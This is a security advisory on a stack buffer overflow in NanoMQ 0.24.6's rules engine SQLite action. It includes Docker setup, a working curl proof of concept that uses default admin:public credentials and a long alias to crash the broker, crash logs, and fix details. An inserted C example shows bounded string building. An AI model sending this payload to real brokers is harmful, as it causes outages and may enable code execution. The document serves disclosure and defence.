NanoMQ Rules Engine Remote Buffer Overflow
=======
Summary
=======
A stack-based buffer overflow vulnerability exists in NanoMQ version 0.24.6, allowing remote attackers to cause a Denial of Service (DoS) and potentially achieve Remote Code Execution (RCE). The vulnerability requires admin privileges, but use of default credentials (admin:public) may be common, lowering the barrier to access and increasing the practical impact.
Target: NanoMQ (emqx/nanomq:latest-full image tested)
Version Affected: ≤ 0.24.6
============
How It Works
============
The vulnerability is located in the Rule Engine's SQLite integration. When a user creates a rule with a SQLite action, NanoMQ dynamically constructs a CREATE TABLE SQL statement. The flaw stems from unsafe use of string copy functions while building that statement.
For the vulnerability to be exploitable, two conditions must be met:
1. HTTP Server Must Be Enabled: The NanoMQ HTTP server must be active to expose the /api/v4/rules endpoint.
2. Rule Engine Must Be Compiled: The NanoMQ binary must be compiled with the Rule Engine feature enabled (-DENABLE_RULE_ENGINE=ON). This is not the default for release binaries.
However, note that the popular emqx/nanomq:latest-full Docker image, which has over 100,000 downloads, comes with the rule engine enabled by default, making it vulnerable if the HTTP server is enabled.
=======
Testing
=======
Triggering the buffer overflow requires sending a POST request to the /api/v4/rules endpoint. The request must contain a JSON payload with a long alias in the rawsql field.
===========
Environment
===========
docker run -d --name nanomq-test -p 8081:8081 -e NANOMQ_HTTP_SERVER_ENABLE=true emqx/nanomq:latest-full
===
PoC
===
curl -u admin:public -X POST http://localhost:8081/api/v4/rules -H "Content-Type: application/json" -d "{\"rawsql\": \"SELECT qos as $(perl -e 'print \"A\" x 180' ) FROM \\\"test/topic\\\"\", \"actions\": [{\"name\": \"sqlite\", \"params\": {\"table\": \"table\"}}]}"
After sending the request, the NanoMQ instance will crash, and the logs will show buffer overflow detection.
====
Logs
====
*** buffer overflow detected ***: terminated
WARN /home/runner/work/nanomq/nanomq/nanomq/apps/broker.c:1288 broker: NanoMQ (ver 0.24.6) Serving HTTP Server on http://(null):8081
NanoMQ Broker is started successfully!
ERROR /home/runner/work/nanomq/nanomq/nanomq/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: near "table": syntax error
ERROR /home/runner/work/nanomq/nanomq/nanomq/rest_api.c:1858 post_rules_sqlite: Sqlite post error!
ERROR /home/runner/work/nanomq/nanomq/nanomq/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: (null)
ERROR /home/runner/work/nanomq/nanomq/nanomq/rest_api.c:1858 post_rules_sqlite: Sqlite post error!
ERROR /home/runner/work/nanomq/nanomq/nanomq/apps/broker.c:114 sig_handler: signal signumber: 6 received!
======
Impact
======
This vulnerability may lead to:
- Denial of Service (DoS): A remote attacker can crash the NanoMQ broker with a single request.
- Remote Code Execution (RCE): A sophisticated attacker could potentially craft a payload to exploit the buffer overflow and execute arbitrary code.
==========
Mitigation
==========
The vulnerability was addressed in NanoMQ version 0.24.7 by replacing an unsafe strcpy() function with snprintf(). This ensures that all string operations are bounds-checked, preventing the buffer overflow.
The fix was introduced in this commit:
- https://github.com/nanomq/nanomq/commit/f6f5d1d2c01cbd56212924a1dfb59152ac63cc81
Users can upgrade to NanoMQ version 0.24.7 or later to mitigate this vulnerability.
Other mitigations could include ensuring the HTTP server or Rules Engine is disabled.
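The bounded-copy approach described above, as an added example (not NanoMQ's code and not the code from the fix commit): it builds a CREATE TABLE statement from rule aliases with snprintf() and rejects input that would be truncated, because snprintf() on its own silently cuts the string. The buffer size SQL_CAP, the function names and the INT column type are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define SQL_CAP 128 /* assumed buffer size; the advisory does not state the real one */

/* Pattern the advisory describes, kept as a comment so nothing here overflows:
 *     char buf[SQL_CAP]; strcpy(buf, alias);   // no bound on alias length */

/* Bounded append of a+b+c. Returns 0 on success; on error or truncation it
 * restores the previous contents and returns -1, so a cut-off statement is never used. */
static int sql_append(char *sql, size_t cap, const char *a, const char *b, const char *c)
{
    size_t used = strlen(sql);
    int n = snprintf(sql + used, cap - used, "%s%s%s", a, b, c);
    if (n < 0 || (size_t)n >= cap - used) {
        sql[used] = '\0';
        return -1;
    }
    return 0;
}

/* Build "CREATE TABLE IF NOT EXISTS <table>(<alias> INT, ...)" from rule aliases. */
int build_create_table(char *sql, size_t cap, const char *table,
                       const char *const *aliases, size_t count)
{
    if (cap == 0) return -1;
    sql[0] = '\0';
    if (sql_append(sql, cap, "CREATE TABLE IF NOT EXISTS ", table, "(") != 0) return -1;
    for (size_t i = 0; i < count; i++)
        if (sql_append(sql, cap, i ? ", " : "", aliases[i], " INT") != 0) return -1;
    return sql_append(sql, cap, ")", "", "");
}

/* Constructed input: an alias of n 'A' characters, like the one in the request above. */
int try_alias_len(size_t n)
{
    char alias[256], sql[SQL_CAP];
    if (n >= sizeof alias) return -1;
    memset(alias, 'A', n);
    alias[n] = '\0';
    const char *const cols[] = { alias };
    return build_create_table(sql, sizeof sql, "t1", cols, 1);
}

int main(void)
{
    printf("alias len 3 -> %d, alias len 180 -> %d\n", try_alias_len(3), try_alias_len(180));
    return 0;
}
```

A caller should treat -1 as a rejected rule and return an error to the API client rather than pass a partial statement to SQLite.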
Jeremy Brown (jbrown3264/gmail), Jan 2026